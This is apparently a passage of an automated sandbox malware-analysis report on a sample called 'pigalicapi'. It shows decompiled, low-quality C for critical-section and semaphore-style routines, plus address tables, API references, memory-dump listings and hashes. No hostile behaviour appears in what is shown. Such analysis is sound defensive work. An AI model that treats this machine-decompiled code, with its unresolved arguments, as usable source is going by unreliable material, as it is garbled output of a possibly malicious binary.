                                                                                                                                                                                                                                                                                                        0x00416bd0
                                                                                                                                                                                                                                                                                                        0x00416bd9
                                                                                                                                                                                                                                                                                                        0x00416bdf
                                                                                                                                                                                                                                                                                                        0x00416c00
                                                                                                                                                                                                                                                                                                        0x00416c03
                                                                                                                                                                                                                                                                                                        0x00416c06
                                                                                                                                                                                                                                                                                                        0x00416c0d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416be1
                                                                                                                                                                                                                                                                                                        0x00416bea
                                                                                                                                                                                                                                                                                                        0x00416bf2
                                                                                                                                                                                                                                                                                                        0x00416bf9
                                                                                                                                                                                                                                                                                                        0x00416c0f
                                                                                                                                                                                                                                                                                                        0x00416c12
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416bf9
                                                                                                                                                                                                                                                                                                        0x00416bdf
                                                                                                                                                                                                                                                                                                        0x00416c1b

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 00416BB4
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00416BD0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00415CC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CD4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00415CC0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CFB
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00416C33
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8458b5734e16408b39341963bf49e5e1ccedcd04d7dc40a0a900725c30042377
                                                                                                                                                                                                                                                                                                        • Instruction ID: afac81c6ed25875daa77134f2d8d7e06c8d97d8ea1c66be795d6737b6d9f3f86
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8458b5734e16408b39341963bf49e5e1ccedcd04d7dc40a0a900725c30042377
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5311874A003058FCB10EF69D4846AABBF4FF48314F01856AEC958B345E738E886CBD6
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                                                                                                                        			E00416830(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t28;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t36;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t41;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t52;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t54;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t23 = 0x16;
                                                                                                                                                                                                                                                                                                        				_t52 = _t51 - 0x10;
                                                                                                                                                                                                                                                                                                        				_t41 = _a4;
                                                                                                                                                                                                                                                                                                        				if(_t41 == 0) {
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					return _t23;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_t36 =  *_t41;
                                                                                                                                                                                                                                                                                                        				if(_t36 == 0) {
                                                                                                                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(_t36 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        					_t23 = 0;
                                                                                                                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if( *_t36 == 0xc0bab1fd) {
                                                                                                                                                                                                                                                                                                        					_t3 = _t36 + 0x14; // 0x40ef44
                                                                                                                                                                                                                                                                                                        					_t49 = _t3;
                                                                                                                                                                                                                                                                                                        					 *_t52 = _t49;
                                                                                                                                                                                                                                                                                                        					EnterCriticalSection(??);
                                                                                                                                                                                                                                                                                                        					_t4 = _t36 + 0xc; // 0x26748d
                                                                                                                                                                                                                                                                                                        					_t24 =  *_t4;
                                                                                                                                                                                                                                                                                                        					_t54 = _t52 - 4;
                                                                                                                                                                                                                                                                                                        					if(_t24 == 0) {
                                                                                                                                                                                                                                                                                                        						_t10 = _t36 + 0x10; // 0x424448b
                                                                                                                                                                                                                                                                                                        						if( *((intOrPtr*)(_t36 + 8)) <=  *_t10) {
                                                                                                                                                                                                                                                                                                        							L15:
                                                                                                                                                                                                                                                                                                        							 *_t54 = _t49;
                                                                                                                                                                                                                                                                                                        							LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        							E00412210();
                                                                                                                                                                                                                                                                                                        							_t23 = 0;
                                                                                                                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t12 = _t36 + 0x68; // 0x5f74c085
                                                                                                                                                                                                                                                                                                        						_t13 = _t36 + 0x60; // 0x40ef90
                                                                                                                                                                                                                                                                                                        						_v24 = _t13;
                                                                                                                                                                                                                                                                                                        						_t15 = _t36 + 0x48; // 0x40ef78
                                                                                                                                                                                                                                                                                                        						 *_t54 = _t15;
                                                                                                                                                                                                                                                                                                        						_t28 = E00416590( *_t12, 0xffffffff, 1);
                                                                                                                                                                                                                                                                                                        						if(_t28 != 0) {
                                                                                                                                                                                                                                                                                                        							_v16 = _t28;
                                                                                                                                                                                                                                                                                                        							 *_t54 = _t49;
                                                                                                                                                                                                                                                                                                        							LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        							E00412210();
                                                                                                                                                                                                                                                                                                        							_t23 = _v16;
                                                                                                                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t16 = _t36 + 0x10; // 0x424448b
                                                                                                                                                                                                                                                                                                        						_t45 =  *_t16;
                                                                                                                                                                                                                                                                                                        						_t17 = _t36 + 8; // 0x90c3ffff
                                                                                                                                                                                                                                                                                                        						_t30 =  *_t17;
                                                                                                                                                                                                                                                                                                        						if(_t45 != 0) {
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t36 + 0x10)) = 0;
                                                                                                                                                                                                                                                                                                        							_t30 = _t30 - _t45;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t36 + 8)) = _t30 - 1;
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t36 + 0xc)) = 1;
                                                                                                                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                                                                                                                        						 *_t54 = _t49;
                                                                                                                                                                                                                                                                                                        						LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        						_t8 = _t36 + 0x64; // 0x8b0000
                                                                                                                                                                                                                                                                                                        						_t9 = _t36 + 0x2c; // 0x40ef5c
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t54 - 4)) = _t36 + 0x44;
                                                                                                                                                                                                                                                                                                        						_t33 = E00415CC0( *_t8, _t9, 1);
                                                                                                                                                                                                                                                                                                        						E00412210();
                                                                                                                                                                                                                                                                                                        						_t23 = _t33;
                                                                                                                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t5 = _t36 + 8; // 0x90c3ffff
                                                                                                                                                                                                                                                                                                        					_t47 =  *_t5;
                                                                                                                                                                                                                                                                                                        					if(_t47 == 0) {
                                                                                                                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t36 + 8)) = _t47 - 1;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t36 + 0xc)) = _t24 + 1;
                                                                                                                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                                                                                                        0x00416831
                                                                                                                                                                                                                                                                                                        0x0041683a
                                                                                                                                                                                                                                                                                                        0x0041683d
                                                                                                                                                                                                                                                                                                        0x00416842
                                                                                                                                                                                                                                                                                                        0x00416857
                                                                                                                                                                                                                                                                                                        0x0041685d
                                                                                                                                                                                                                                                                                                        0x0041685d
                                                                                                                                                                                                                                                                                                        0x00416844
                                                                                                                                                                                                                                                                                                        0x00416848
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041684d
                                                                                                                                                                                                                                                                                                        0x00416860
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416860
                                                                                                                                                                                                                                                                                                        0x00416855
                                                                                                                                                                                                                                                                                                        0x00416864
                                                                                                                                                                                                                                                                                                        0x00416864
                                                                                                                                                                                                                                                                                                        0x00416867
                                                                                                                                                                                                                                                                                                        0x0041686a
                                                                                                                                                                                                                                                                                                        0x00416870
                                                                                                                                                                                                                                                                                                        0x00416870
                                                                                                                                                                                                                                                                                                        0x00416873
                                                                                                                                                                                                                                                                                                        0x00416878
                                                                                                                                                                                                                                                                                                        0x004168c0
                                                                                                                                                                                                                                                                                                        0x004168c6
                                                                                                                                                                                                                                                                                                        0x00416910
                                                                                                                                                                                                                                                                                                        0x00416910
                                                                                                                                                                                                                                                                                                        0x00416913
                                                                                                                                                                                                                                                                                                        0x0041691c
                                                                                                                                                                                                                                                                                                        0x00416921
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416921
                                                                                                                                                                                                                                                                                                        0x004168c8
                                                                                                                                                                                                                                                                                                        0x004168cb
                                                                                                                                                                                                                                                                                                        0x004168d3
                                                                                                                                                                                                                                                                                                        0x004168d7
                                                                                                                                                                                                                                                                                                        0x004168da
                                                                                                                                                                                                                                                                                                        0x004168e2
                                                                                                                                                                                                                                                                                                        0x004168e9
                                                                                                                                                                                                                                                                                                        0x00416928
                                                                                                                                                                                                                                                                                                        0x0041692b
                                                                                                                                                                                                                                                                                                        0x0041692e
                                                                                                                                                                                                                                                                                                        0x00416937
                                                                                                                                                                                                                                                                                                        0x0041693c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041693c
                                                                                                                                                                                                                                                                                                        0x004168eb
                                                                                                                                                                                                                                                                                                        0x004168eb
                                                                                                                                                                                                                                                                                                        0x004168ee
                                                                                                                                                                                                                                                                                                        0x004168ee
                                                                                                                                                                                                                                                                                                        0x004168f3
                                                                                                                                                                                                                                                                                                        0x004168f5
                                                                                                                                                                                                                                                                                                        0x004168fc
                                                                                                                                                                                                                                                                                                        0x004168fc
                                                                                                                                                                                                                                                                                                        0x00416901
                                                                                                                                                                                                                                                                                                        0x00416904
                                                                                                                                                                                                                                                                                                        0x00416891
                                                                                                                                                                                                                                                                                                        0x00416891
                                                                                                                                                                                                                                                                                                        0x00416894
                                                                                                                                                                                                                                                                                                        0x0041689a
                                                                                                                                                                                                                                                                                                        0x0041689d
                                                                                                                                                                                                                                                                                                        0x004168ab
                                                                                                                                                                                                                                                                                                        0x004168ae
                                                                                                                                                                                                                                                                                                        0x004168b5
                                                                                                                                                                                                                                                                                                        0x004168ba
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004168ba
                                                                                                                                                                                                                                                                                                        0x0041687a
                                                                                                                                                                                                                                                                                                        0x0041687a
                                                                                                                                                                                                                                                                                                        0x0041687f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041688b
                                                                                                                                                                                                                                                                                                        0x0041688e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041688e
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(0040EF30,?,?,0041586E), ref: 0041686A
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,0041586E), ref: 00416894
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 67f6eefd186e211514c6403da3bfbfd4d13a57ff0a28058042ffd3782a5fdb61
                                                                                                                                                                                                                                                                                                        • Instruction ID: 05cb7648b5923e93bfa705c3ba05a15a8be0429bffce4b91882e804ee0f157c8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67f6eefd186e211514c6403da3bfbfd4d13a57ff0a28058042ffd3782a5fdb61
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07316CB06002018FDB10BF69C5C46AA7BA1FF44314F15C96EEC158B34AE739D985CB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                                                                                                                        			E00416950(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t28;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t35;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                                                                                                                                        				signed int _t45;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t49;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t51;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t23 = 0x16;
                                                                                                                                                                                                                                                                                                        				_t49 = _t48 - 0x1c;
                                                                                                                                                                                                                                                                                                        				_t40 = _a4;
                                                                                                                                                                                                                                                                                                        				if(_t40 == 0) {
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					return _t23;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_t35 =  *_t40;
                                                                                                                                                                                                                                                                                                        				if(_t35 == 0) {
                                                                                                                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(_t35 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        					_t23 = 0;
                                                                                                                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if( *_t35 == 0xc0bab1fd) {
                                                                                                                                                                                                                                                                                                        					_t46 = _t35 + 0x14;
                                                                                                                                                                                                                                                                                                        					 *_t49 = _t46;
                                                                                                                                                                                                                                                                                                        					EnterCriticalSection(??);
                                                                                                                                                                                                                                                                                                        					_t24 =  *((intOrPtr*)(_t35 + 0xc));
                                                                                                                                                                                                                                                                                                        					_t51 = _t49 - 4;
                                                                                                                                                                                                                                                                                                        					if(_t24 == 0) {
                                                                                                                                                                                                                                                                                                        						if( *((intOrPtr*)(_t35 + 8)) <=  *((intOrPtr*)(_t35 + 0x10))) {
                                                                                                                                                                                                                                                                                                        							L15:
                                                                                                                                                                                                                                                                                                        							 *_t51 = _t46;
                                                                                                                                                                                                                                                                                                        							LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        							E00412210();
                                                                                                                                                                                                                                                                                                        							_t23 = 0;
                                                                                                                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v40 = _t35 + 0x60;
                                                                                                                                                                                                                                                                                                        						 *_t51 = _t35 + 0x48;
                                                                                                                                                                                                                                                                                                        						_t28 = E00416590( *((intOrPtr*)(_t35 + 0x68)), 0xffffffff, 1);
                                                                                                                                                                                                                                                                                                        						if(_t28 != 0) {
                                                                                                                                                                                                                                                                                                        							_v32 = _t28;
                                                                                                                                                                                                                                                                                                        							 *_t51 = _t46;
                                                                                                                                                                                                                                                                                                        							LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        							E00412210();
                                                                                                                                                                                                                                                                                                        							_t23 = _v32;
                                                                                                                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t30 =  *((intOrPtr*)(_t35 + 0x10));
                                                                                                                                                                                                                                                                                                        						_t45 =  *((intOrPtr*)(_t35 + 8));
                                                                                                                                                                                                                                                                                                        						if(_t30 != 0) {
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t35 + 0x10)) = 0;
                                                                                                                                                                                                                                                                                                        							_t45 = _t45 - _t30;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t35 + 8)) = 0;
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t35 + 0xc)) = _t45;
                                                                                                                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                                                                                                                        						 *_t51 = _t46;
                                                                                                                                                                                                                                                                                                        						LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t51 - 4)) = _t35 + 0x44;
                                                                                                                                                                                                                                                                                                        						_t32 = E00415CC0( *((intOrPtr*)(_t35 + 0x64)), _t35 + 0x2c, _t45);
                                                                                                                                                                                                                                                                                                        						E00412210();
                                                                                                                                                                                                                                                                                                        						_t23 = _t32;
                                                                                                                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t45 =  *((intOrPtr*)(_t35 + 8));
                                                                                                                                                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t35 + 8)) = 0;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t35 + 0xc)) = _t24 + _t45;
                                                                                                                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                                                                                                                        			}


















                                                                                                                                                                                                                                                                                                        0x00416951
                                                                                                                                                                                                                                                                                                        0x0041695b
                                                                                                                                                                                                                                                                                                        0x0041695e
                                                                                                                                                                                                                                                                                                        0x00416963
                                                                                                                                                                                                                                                                                                        0x00416978
                                                                                                                                                                                                                                                                                                        0x0041697f
                                                                                                                                                                                                                                                                                                        0x0041697f
                                                                                                                                                                                                                                                                                                        0x00416965
                                                                                                                                                                                                                                                                                                        0x00416969
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041696e
                                                                                                                                                                                                                                                                                                        0x00416980
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416980
                                                                                                                                                                                                                                                                                                        0x00416976
                                                                                                                                                                                                                                                                                                        0x00416984
                                                                                                                                                                                                                                                                                                        0x00416987
                                                                                                                                                                                                                                                                                                        0x0041698a
                                                                                                                                                                                                                                                                                                        0x00416990
                                                                                                                                                                                                                                                                                                        0x00416993
                                                                                                                                                                                                                                                                                                        0x00416998
                                                                                                                                                                                                                                                                                                        0x004169e6
                                                                                                                                                                                                                                                                                                        0x00416a30
                                                                                                                                                                                                                                                                                                        0x00416a30
                                                                                                                                                                                                                                                                                                        0x00416a33
                                                                                                                                                                                                                                                                                                        0x00416a3c
                                                                                                                                                                                                                                                                                                        0x00416a41
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416a41
                                                                                                                                                                                                                                                                                                        0x004169f3
                                                                                                                                                                                                                                                                                                        0x004169fa
                                                                                                                                                                                                                                                                                                        0x00416a02
                                                                                                                                                                                                                                                                                                        0x00416a09
                                                                                                                                                                                                                                                                                                        0x00416a48
                                                                                                                                                                                                                                                                                                        0x00416a4b
                                                                                                                                                                                                                                                                                                        0x00416a4e
                                                                                                                                                                                                                                                                                                        0x00416a57
                                                                                                                                                                                                                                                                                                        0x00416a5c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416a5c
                                                                                                                                                                                                                                                                                                        0x00416a0b
                                                                                                                                                                                                                                                                                                        0x00416a0e
                                                                                                                                                                                                                                                                                                        0x00416a13
                                                                                                                                                                                                                                                                                                        0x00416a15
                                                                                                                                                                                                                                                                                                        0x00416a1c
                                                                                                                                                                                                                                                                                                        0x00416a1c
                                                                                                                                                                                                                                                                                                        0x00416a1e
                                                                                                                                                                                                                                                                                                        0x00416a25
                                                                                                                                                                                                                                                                                                        0x004169b1
                                                                                                                                                                                                                                                                                                        0x004169b1
                                                                                                                                                                                                                                                                                                        0x004169b4
                                                                                                                                                                                                                                                                                                        0x004169c8
                                                                                                                                                                                                                                                                                                        0x004169cb
                                                                                                                                                                                                                                                                                                        0x004169d2
                                                                                                                                                                                                                                                                                                        0x004169d7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004169d7
                                                                                                                                                                                                                                                                                                        0x0041699a
                                                                                                                                                                                                                                                                                                        0x0041699f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004169a7
                                                                                                                                                                                                                                                                                                        0x004169ae
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004169ae
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 0041698A
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 004169B4
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: c33ec732f80b659cce35f99fb264f15b02028685b48b232e4bea87b4582e7bd9
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1550a3b30af1b3d5739506e796b0290a9769e07061fc54df4d8527e034a952a5
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c33ec732f80b659cce35f99fb264f15b02028685b48b232e4bea87b4582e7bd9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35316FB06002018FCB10AF69D5C46AB7BB0EF44350F1A857AEC459F34AE738D895CF9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
